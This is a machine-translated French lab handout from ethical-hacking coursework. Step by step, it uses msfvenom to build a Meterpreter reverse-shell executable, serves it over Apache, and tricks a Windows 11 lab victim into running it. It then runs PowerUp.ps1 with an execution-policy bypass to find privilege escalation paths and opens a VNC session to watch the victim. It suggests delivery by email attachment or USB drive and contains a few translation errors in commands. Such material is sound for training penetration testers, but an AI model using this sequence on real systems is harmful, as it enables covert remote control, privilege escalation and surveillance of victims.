Vous êtes sur la page 1sur 5

Abonnez-vous à DeepL Pro pour traduire des fichiers plus volumineux.

Visitez www.DeepL.com/pro pour en savoir plus.

Tp 6 : Exploiter les vulnérabilités côté client et établir une session


VNC
CyberQ CEHv12 Mod006 Lab01 Task04 Exploiter les vulnérabilités côté client et établir une
session VNC - YouTube

Les attaquants utilisent des vulnérabilités côté client pour accéder à la machine cible.
VNC (Virtual Network Computing) permet à un attaquant d'accéder à distance aux
ordinateurs ciblés et de les contrôler à l'aide d'un autre ordinateur ou d'un appareil
mobile, où qu'il se trouve dans le monde. Dans le même temps, VNC est également
utilisé par les administrateurs de réseau et les organisations dans tous les secteurs
d'activité pour toute une série de scénarios et d'utilisations différents, notamment pour
fournir une assistance informatique à des collègues et à des amis et pour accéder à des
systèmes et à des services en déplacement.
Cette tâche démontre la procédure d'exploitation appliquée à une machine Windows
11 faiblement corrigée qui vous permet d'y accéder à distance par le biais d'une
connexion de bureau à distance. Nous verrons ici comment les attaquants peuvent
exploiter les vulnérabilités des systèmes cibles pour établir des sessions VNC non
autorisées à l'aide de Metasploit et contrôler ces cibles à distance.
Note : Dans cette tâche, nous utiliserons la machine Parrot Security (ipadress) comme
système hôte et la machine Windows 11 (ipadress) comme système cible.
1. Activez la machine virtuelle Parrot Security.
2. Basculez sur la machine virtuelle Parrot Security. Dans la page de connexion, le
nom d'utilisateur de l'attaquant sera sélectionné par défaut. Entrez le mot de passe toor
dans le champ Password et appuyez sur Enter pour vous connecter à la machine.
Note : Si une fenêtre contextuelle de Parrot Updater apparaît dans le coin supérieur
droit du bureau, ignorez-la et fermez-la.
Note : Si une fenêtre contextuelle vous demandant de mettre à jour la machine
apparaît, cliquez sur Non pour fermer la fenêtre.
3. Cliquez sur l'icône du terminal MATE en haut de la fenêtre du bureau pour
ouvrir une fenêtre de terminal.
4. Une fenêtre Parrot Terminal apparaît. Dans la fenêtre du terminal, tapez sudo su et
appuyez sur Entrée pour exécuter les programmes en tant qu'utilisateur root.
5. Dans le champ (sudo] password for attacker, tapez toor comme mot de passe et
appuyez sur Enter. Note : Le mot de passe que vous tapez ne sera pas visible.
6. Une fenêtre de Parrot Terminal apparaît ; tapez msfvenom -p
windows/meterpreter/reverse_tcp -platform windows -a x86 -f exe LHOST-[IP
Adresse de la machine hôte] LPORT=444 -o /home/attacker/Desktop/Test.exe et
appuyez sur Entrée.
Note : Ici, l'adresse IP de l'hôte magis 10.10.1.13 (machine Parrot Security).
7. Cette opération génère Test.exe, un fichier malveillant à l'emplacement
/home/attacker/Desktop, comme le montre la capture d'écran.
8. Maintenant, créez un répertoire pour partager ce fichier avec la machine cible,
fournissez les permissions et copiez le fichier du bureau vers l'emplacement partagé à
l'aide des commandes ci-dessous : Tapez mkdir /var/www/html/share et appuyez sur
Entrée pour créer un dossier partagé.
Tapez chmod -R 755 /var/www/html/share et appuyez sur Entrée.
Tapez chown -R www-data:www-data /var/www/html/share et appuyez sur
Entrée Copiez le fichier malveillant à l'emplacement partagé en tapant cp
/home/attacker/Desktop/Test.exe /var/www/html/share et appuyez sur Entrée.
Note : Ici, nous envoyons la charge utile malveillante via un répertoire partagé ;
mais en temps réel, vous pouvez l'envoyer via une pièce jointe dans un courrier
électronique ou par des moyens physiques tels qu'un disque dur ou un lecteur de
stylo.
9. Démarrez maintenant le service apache. Pour ce faire, tapez service apache2
start et appuyez sur Entrée.
10. Tapez msfconsole et appuyez sur Entrée pour lancer le cadre Metasploit.
11. Dans msfconsole, tapez use exploit/multi/handler et appuyez sur Entrée.
12. Maintenant, définissez la charge utile, LHOST et LPORT. Pour ce faire, utilisez
les commandes suivantes : Tapez set payload windows/meterpreter/reverse_tcp et
appuyez sur Entrée.
Tapez set LHOST 10.10.1.13 et appuyez sur
Enter Tapez set LPORT 444 et appuyez sur
Enter
13. Après avoir saisi les informations ci-dessus, tapez exploit et appuyez sur Entrée
pour lancer l'auditeur.
14. Passez à la machine virtuelle Windows 11.
15. Ouvrez un navigateur web (ici, Mozilla Firefox). Dans la barre d'adresse,
placez votre souris
tapez http://10.10.1.13/share et appuyez sur Entrée. Dès que vous appuyez sur Entrée,
le contenu du dossier partagé s'affiche, comme le montre la capture d'écran.
16. Cliquez sur Test.exe pour télécharger le fichier.
Note : 10.10.1.13 est l'adresse IP de la machine hôte (ici, la machine Parrot Security).
17. Une fois que vous avez cliqué sur le fichier Test.exe, la fenêtre contextuelle
Ouvrir Test.exe apparaît ; sélectionnez Enregistrer le fichier.
18. Le fichier malveillant sera téléchargé à l'emplacement de téléchargement par défaut
du navigateur (ici,
Téléchargements). Naviguez ensuite jusqu'à cet emplacement et double-cliquez sur
le fichier Test.exe pour l'exécuter.
19. La fenêtre Ouvrir un fichier - Avertissement de sécurité s'affiche ; cliquez sur
Exécuter.
20. Laissez la machine virtuelle Windows 11 en marche, de sorte que le fichier
Test.exe s'exécute en arrière-plan, et passez à la machine virtuelle Parrot Security.
21. Observez qu'une session a été créée ou ouverte dans le shell Meterpreter,
comme le montre la capture d'écran.
22. Tapez sysinfo et appuyez sur Entrée pour vérifier que vous avez piraté le
Windows 11 ciblé.
Note : Si le shell Meterpreter n'est pas automatiquement connecté à la session, tapez
sessions -i1 et appuyez sur Entrée pour ouvrir une session dans le shell Meterpreter.
23. Maintenant, tapez upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1 et
appuyez sur
Entrer. Cette commande télécharge le fichier PowerSploit (PowerUp.ps1) dans le
répertoire de travail actuel du système cible.
Note : PowerUp.ps1 est un programme qui permet à un utilisateur d'effectuer des
vérifications rapides sur une machine Windows pour détecter les opportunités
d'élévation de privilèges. Il utilise diverses vérifications d'abus de service,
d'opportunités de détournement de dl, de vérifications de registre, etc. pour énumérer
les méthodes d'élévation courantes pour un système cible.
24. Tapez shell et appuyez sur Entrée pour ouvrir une session shell. Observez
que le répertoire de travail actuel pointe vers le dossier Downloads du système
cible.
25. Tapez powershell -ExecutionPolicy Bypass -Command ".
\PowerUp.ps1;lnvoke- AllChecks" et appuyez sur Entrée pour exécuter le fichier
PowerUp.ps1.
Note : Assurez-vous d'avoir ajouté un espace entre deux points après -Command ".
[espace]. Pour une meilleure compréhension, voir la capture d'écran après l'étape 26.
26. Un résultat apparaît, affichant Check et AbuseFunction comme le
montre la capture d'écran.
Note : Les attaquants exploitent des services mal configurés tels que des chemins de
service non cotés, des permissions d'objets de service, des installations sans
surveillance, des autoruns et des configurations de registre modifiables, et d'autres
emplacements pour élever les privilèges d'accès. Après avoir établi une session active
à l'aide de Metasploit, les attaquants utilisent des outils tels que PowerSploit pour
détecter les services mal configurés qui existent dans le système d'exploitation cible.
27. Maintenant, tapez exit et appuyez sur Enter pour revenir à la session Meterpreter.
28. Exploitez maintenant la vulnérabilité de VNC pour obtenir un accès à
distance à la machine Windows 11. Pour ce faire
tapez donc run vnc et appuyez sur Entrée.
29. Cela ouvrira une session VNC pour la machine cible, comme le montre la
capture d'écran. Cette session vous permet de voir les activités de la victime sur le
système, y compris les fichiers, sites web, logiciels et autres ressources que
l'utilisateur ouvre ou exécute.
30. Ceci conclut la démonstration de l'exploitation des vulnérabilités côté client et de
l'établissement d'une session VNC à l'aide de Metasploit.

31. Fermez toutes les fenêtres ouvertes et documentez toutes les informations acquises.

Vous aimerez peut-être aussi